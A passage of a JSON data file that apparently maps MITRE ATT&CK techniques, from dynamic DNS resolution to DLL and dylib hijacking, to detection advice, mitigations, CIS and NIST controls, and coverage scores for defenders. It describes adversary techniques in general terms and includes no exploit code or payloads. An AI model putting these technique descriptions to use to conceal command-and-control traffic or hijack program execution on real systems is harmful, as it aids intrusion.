detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1568.001", + "name": "Dynamic Resolution: Fast Flux DNS", + "url": "https://attack.mitre.org/techniques/T1568/001", + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "detection": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.", + "mitigations": [] + }, + { + "tid": "T1568.002", + "name": "Dynamic Resolution: Domain Generation Algorithms", + "url": "https://attack.mitre.org/techniques/T1568/002", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ] + }, + { + "tid": "T1568.003", + "name": "Dynamic Resolution: DNS Calculation", + "url": "https://attack.mitre.org/techniques/T1568/003", + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", + "detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.", + "mitigations": [] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "cumulative_score": 0.3052047619047619, + "adjusted_score": 0.3052047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "9.2,13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "SC-20", + "SC-21", + "SC-22", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1569", + "name": "System Services", + "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.", + "url": "https://attack.mitre.org/techniques/T1569", + "tactics": [ + "Execution" + ], + "detection": "Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.", + "platforms": [ + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Modification", + "Process: Process Creation", + "Service: Service Creation", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1569.001", + "name": "System Services: Launchctl", + "url": "https://attack.mitre.org/techniques/T1569/001", + "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n", + "detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1569.002", + "name": "System Services: Service Execution", + "url": "https://attack.mitre.org/techniques/T1569/002", + "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.", + "detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 1.495247719247619, + "adjusted_score": 1.495247719247619, + "has_car": true, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.1,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-11", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "IA-2", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1570", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", + "url": "https://attack.mitre.org/techniques/T1570", + "tactics": [ + "Lateral Movement" + ], + "detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "File: File Metadata", + "Named Pipe: Named Pipe Metadata", + "Network Share: Network Share Access", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 1.146364215241905, + "adjusted_score": 1.146364215241905, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "4.2,4.4,4.5,7.6,7.7,13.3,13.4,13.8,18.2,18.3" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1571", + "name": "Non-Standard Port", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.", + "url": "https://attack.mitre.org/techniques/T1571", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 0.6685916625485713, + "adjusted_score": 0.6685916625485713, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,12.2,12.8,13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1572", + "name": "Protocol Tunneling", + "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ", + "url": "https://attack.mitre.org/techniques/T1572", + "tactics": [ + "Command And Control" + ], + "detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.4857663874647619, + "adjusted_score": 0.4857663874647619, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,7.7,9.3,13.3,13.4,13.8" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1573", + "name": "Encrypted Channel", + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", + "url": "https://attack.mitre.org/techniques/T1573", + "tactics": [ + "Command And Control" + ], + "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1573.001", + "name": "Encrypted Channel: Symmetric Cryptography", + "url": "https://attack.mitre.org/techniques/T1573/001", + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", + "detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1573.002", + "name": "Encrypted Channel: Asymmetric Cryptography", + "url": "https://attack.mitre.org/techniques/T1573/002", + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", + "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + } + ], + "cumulative_score": 0.26867508120380956, + "adjusted_score": 0.26867508120380956, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-12", + "SC-16", + "SC-23", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1574", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", + "url": "https://attack.mitre.org/techniques/T1574", + "tactics": [ + "Defense Evasion", + "Persistence", + "Privilege Escalation" + ], + "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Creation", + "File: File Modification", + "Module: Module Load", + "Process: Process Creation", + "Service: Service Metadata", + "Windows Registry: Windows Registry Key Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1574.001", + "name": "Hijack Execution Flow: DLL Search Order Hijacking", + "url": "https://attack.mitre.org/techniques/T1574/001", + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", + "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + } + ] + }, + { + "tid": "T1574.002", + "name": "Hijack Execution Flow: DLL Side-Loading", + "url": "https://attack.mitre.org/techniques/T1574/002", + "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", + "detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1574.004", + "name": "Hijack Execution Flow: Dylib Hijacking", + "url": "https://attack.mitre.org/techniques/T1574/004", + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space 